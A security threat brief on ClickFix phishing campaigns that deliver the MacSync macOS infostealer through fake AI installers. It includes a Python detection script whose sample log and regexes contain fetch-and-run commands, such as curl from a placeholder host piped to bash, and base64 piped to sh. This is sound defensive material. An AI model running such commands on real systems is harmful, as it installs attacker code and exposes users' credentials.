ClickFix Campaigns Deploy MacSync macOS Infostealer via Fake AI Tool Installers
What Happened — Three distinct ClickFix phishing campaigns were uncovered delivering the macOS information‑stealer MacSync. The attackers disguise the payload as “AI‑powered” utilities and trick victims into copying and running malicious shell commands themselves. Once executed, MacSync harvests credentials, browser data, and system information.
Why It Matters for TPRM —
- macOS endpoints are increasingly used by third‑party vendors and remote workforces; a successful infection can expose sensitive corporate data.
- Credential theft enables lateral movement into partner networks, amplifying supply‑chain risk.
- Delivery relies purely on social engineering rather than an exploit, so it bypasses exploit‑focused defenses and calls for updated user‑awareness controls.
Who Is Affected — Enterprises across all sectors that allow macOS devices (e.g., TECH_SAAS, FIN_SERV, PROF_SERV) and managed service providers (MSPs) supporting macOS workstations.
Recommended Actions —
- Conduct immediate user‑awareness training on fake installer scams and command‑line phishing.
- Enforce application‑whitelisting or notarization policies on macOS endpoints.
- Block known ClickFix domains/IPs and monitor DNS queries for related indicators.
- Deploy endpoint detection that can flag MacSync binaries and their typical file paths.
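The monitoring actions above can be prototyped as a triage pass over process-execution records. The following is an added example, not code from the brief, from The Hacker News, or from any EDR vendor: it scores constructed JSON log lines for the paste-and-run shell patterns ClickFix lures depend on, checks fetched hosts against an indicator list, and raises the severity when the shell was spawned from an interactive terminal. The record format, field names (`ts`, `user`, `parent`, `cmd`), the `BLOCKED_DOMAINS` entry, and the regex heuristics are all assumptions for illustration; real MacSync domains and file paths must come from your threat-intel feed.

```python
"""Heuristic triage of macOS process-execution records for
ClickFix-style "copy this command into your terminal" activity.

Added example for illustration. The record format, field names and
indicator values are constructed assumptions; MacSync's real domains
and paths are not known to this script and must be supplied from a
threat-intel feed.
"""

import json
import re

# Placeholder indicator list. The value below is constructed; replace it
# with domains/IPs from your intel provider before use.
BLOCKED_DOMAINS = {"example-clickfix-placeholder.invalid"}

# Parents that indicate a human typed or pasted the command.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}

# Behaviours typical of paste-and-run lures: fetch a remote script and
# pipe it straight into a shell, decode an inline base64 blob into a
# shell, run inline AppleScript, or strip the quarantine attribute that
# Gatekeeper/notarization checks rely on. Each pattern carries the reason
# shown to the analyst.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b"), "remote script piped to shell"),
    (re.compile(r"\bbase64\b.*(-d|--decode).*\|\s*(ba|z)?sh\b"), "base64 payload piped to shell"),
    (re.compile(r"\bosascript\s+-e\b"), "inline AppleScript execution"),
    (re.compile(r"\bxattr\b.*\bcom\.apple\.quarantine\b"), "quarantine attribute stripped"),
]


def extract_hosts(cmd):
    """Return the set of hostnames referenced by http(s) URLs in a command."""
    return set(re.findall(r"https?://([A-Za-z0-9.-]+)", cmd))


def score_record(rec):
    """Return an alert dict for a suspicious record, or None if benign."""
    reasons = [why for pat, why in SUSPICIOUS_PATTERNS if pat.search(rec["cmd"])]
    hits = extract_hosts(rec["cmd"]) & BLOCKED_DOMAINS
    if hits:
        reasons.append("known indicator domain: " + ", ".join(sorted(hits)))
    if not reasons:
        return None
    # A pasted lure is run from a user-facing terminal; the same command
    # from a scheduler or deployment agent gets a lower initial severity
    # unless it touches a known indicator.
    interactive = rec.get("parent") in INTERACTIVE_PARENTS
    severity = "high" if interactive or hits else "medium"
    return {
        "ts": rec["ts"],
        "user": rec["user"],
        "severity": severity,
        "reasons": reasons,
        "cmd": rec["cmd"],
    }


def triage(lines):
    """Parse JSON-lines records and return alerts in log order."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        alert = score_record(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample records (one JSON object per line); not real telemetry.
SAMPLE_LOG = """
{"ts": "2024-01-01T10:00:00Z", "user": "alice", "parent": "Terminal", "cmd": "curl -fsSL https://example-clickfix-placeholder.invalid/setup.sh | bash"}
{"ts": "2024-01-01T10:05:00Z", "user": "bob", "parent": "Terminal", "cmd": "echo aGVsbG8= | base64 --decode | sh"}
{"ts": "2024-01-01T10:07:00Z", "user": "carol", "parent": "Terminal", "cmd": "git pull origin main"}
{"ts": "2024-01-01T10:09:00Z", "user": "jamf", "parent": "launchd", "cmd": "curl -fsSL https://updates.example.com/agent.sh | sh"}
{"ts": "2024-01-01T10:11:00Z", "user": "dave", "parent": "Terminal", "cmd": "xattr -d com.apple.quarantine /Applications/AI-Helper.app"}
"""

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG.splitlines()):
        print(alert["severity"].upper(), alert["user"], "; ".join(alert["reasons"]), sep=" | ")
```

Run against the sample, the script flags four of the five records: the two terminal-launched piped-to-shell commands and the quarantine-stripping command as high, the launchd-parented updater as medium for an analyst to confirm against an allow-list, and the ordinary `git pull` not at all. The heuristics are deliberately coarse; tune the parent set and add allow-listed hosts for your management tooling before relying on the severity values.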
Technical Notes — Attack vector: phishing/social engineering (fake AI tool installers) with no exploit chain; the victim runs the initial command manually. The malware exfiltrates credentials, browser histories, and system metadata. Source: The Hacker News